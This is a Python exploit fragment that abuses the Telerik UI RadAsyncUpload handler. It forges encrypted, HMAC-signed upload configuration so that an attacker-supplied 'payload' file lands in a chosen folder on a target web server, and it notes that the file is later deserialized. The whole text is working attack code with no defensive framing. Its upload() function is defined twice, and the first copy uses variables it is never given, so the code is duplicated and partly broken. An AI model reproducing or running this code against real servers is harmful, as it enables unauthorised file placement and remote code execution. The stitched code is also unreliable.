def upload():
# Build rauPostData.
object = {
'TargetFolder':
RAUCipher.addHmac(RAUCipher.encrypt(''), ui_version),
'TempTargetFolder':
RAUCipher.addHmac(RAUCipher.encrypt(temp_target_folder), ui_version),
'MaxFileSize':
0,
'TimeToLive':
{ # These values seem a bit arbitrary, but when they're all set to 0, the payload disappears shortly after being written to disk.
'Ticks': 1440000000000,
'Days': 0,
'Hours': 40,
'Minutes': 0,
'Seconds': 0,
'Milliseconds': 0,
'TotalDays': 1.6666666666666666,
'TotalHours': 40,
'TotalMinutes': 2400,
'TotalSeconds': 144000,
'TotalMilliseconds': 144000000
},
'UseApplicationPoolImpersonation':
False
}
type = 'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=' + ui_version + ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
raupostdata = build_raupostdata(object, type)
with open(filename_local, 'rb') as f:
payload = f.read()
metadata = {
'TotalChunks': 1,
'ChunkIndex': 0,
'TotalFileSize': 1,
'UploadID': filename_remote # Determines remote filename on disk.
}
# Build multipart form data.
files = {
'rauPostData': (None, raupostdata),
'file': (filename_remote, payload, 'application/octet-stream'),
'fileName': (None, filename_remote),
'contentType': (None, 'application/octet-stream'),
'lastModifiedDate': (None, '1970-01-01T00:00:00.000Z'),
'metadata': (None, dumps(metadata))
}
# Send request.
print('[*] Local payload name: ', filename_local, file=stderr)
print('[*] Destination folder: ', temp_target_folder, file=stderr)
print('[*] Remote payload name:', filename_remote, file=stderr)
print(file=stderr)
send_request(files)
def upload(ui_version, temp_target_folder, filename_local, filename_remote,
url):
# Build rauPostData. The TimeToLive values seem a bit arbitrary, but when
# they're all set to 0, the payload disappears shortly after being written
# to disk.
object_ = {
'TargetFolder':
RAUCipher.addHmac(RAUCipher.encrypt(''), ui_version),
'TempTargetFolder':
RAUCipher.addHmac(
RAUCipher.encrypt(temp_target_folder.replace('/', '\\')),
ui_version),
'MaxFileSize':
0,
'TimeToLive': {
'Ticks': 1440000000000,
'Days': 0,
'Hours': 40,
'Minutes': 0,
'Seconds': 0,
'Milliseconds': 0,
'TotalDays': 1.6666666666666666,
'TotalHours': 40,
'TotalMinutes': 2400,
'TotalSeconds': 144000,
'TotalMilliseconds': 144000000,
},
'UseApplicationPoolImpersonation':
False,
}
type_ = ', '.join([
'Telerik.Web.UI.AsyncUploadConfiguration',
'Telerik.Web.UI',
'Version={}'.format(ui_version),
'Culture=neutral',
'PublicKeyToken=121fae78165ba3d4',
])
raupostdata = build_raupostdata(object_, type_)
with open(filename_local, 'rb') as f:
payload = f.read()
# The UploadID determines the remote filename on disk.
metadata = {
'TotalChunks': 1,
'ChunkIndex': 0,
'TotalFileSize': 1,
'UploadID': filename_remote,
}
# Build multipart form data.
files = {
'rauPostData': (None, raupostdata),
'file': (filename_remote, payload, 'application/octet-stream'),
'fileName': (None, filename_remote),
'contentType': (None, 'application/octet-stream'),
'lastModifiedDate': (None, '1970-01-01T00:00:00.000Z'),
'metadata': (None, dumps(metadata)),
}
# Send request.
print('[*] Local payload name: ', filename_local, file=stderr)
print('[*] Destination folder: ', temp_target_folder, file=stderr)
print('[*] Remote payload name:', filename_remote, file=stderr)
print(file=stderr)
result = send_request(url, files)
# Check for unexpected, additional renaming of payload.
if filename_remote != result['metaData']['TempFileName']:
print(
'\n[*] Heads up!',
'Payload was renamed on target from "{}" to "{}".'.format(
filename_remote, result['metaData']['TempFileName']),
'Will adjust automatically while deserializing; otherwise, if',
'deserializing manually with the "-d" option, use the "-r" option',
'to specify the accurate, renamed payload on target.',
file=stderr)
return result['metaData']['TempFileName']